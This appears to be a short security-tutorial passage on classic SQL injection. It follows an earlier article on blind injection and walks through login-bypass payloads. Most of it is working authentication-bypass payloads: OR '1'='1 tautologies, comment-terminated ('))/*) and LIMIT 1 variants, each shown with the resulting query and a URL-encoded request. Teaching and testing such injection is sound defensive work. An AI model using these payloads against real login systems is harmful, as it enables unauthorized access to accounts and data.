In our previous article we have learned about basic of Blind SQL Injection using untrusted data parsing. Today we will learn in detail about Standard SQL Injection (or Classical SQL Injection) attack in detail. Lets revisit what we have learned in previous article, we have learned about (OR 1=1) i.e. always true condition.
Standard SQL Injection | Injection attacks – Owasp #1 Vulnerability |
SELECT * FROM Users WHERE Username='$username' AND Password='$password'
$username = 1' or '1' = '1
$password = 1' or '1' = '1
SELECT * FROM Users WHERE Username='1' OR '1' = '1' AND Password='1' OR '1' = '1'
http://www.example.com/index.php?username=1'%20or%20'1'%20=%20'1&password=1'%20or%20'1'%20=%20'1
SELECT * FROM Users WHERE ((Username='$username') AND (Password=MD5('$password')))
$username = 1' or '1' = '1'))/*
$password = foo
SELECT * FROM Users WHERE ((Username='1' or '1' = '1'))/*') AND (Password=MD5('$password')))
http://www.example.com/index.php?username=1'%20or%20'1'%20=%20'1'))/*&password=foo
$username = 1' or '1' = '1')) LIMIT 1/*
$password = foo
SELECT * FROM Users WHERE ((Username='1' or '1' = '1')) LIMIT 1/* /*') AND (Password=MD5('$password')))
http://www.example.com/index.php?username=1'%20or%20'1'%20=%20'1')) LIMIT 1/*&password=foo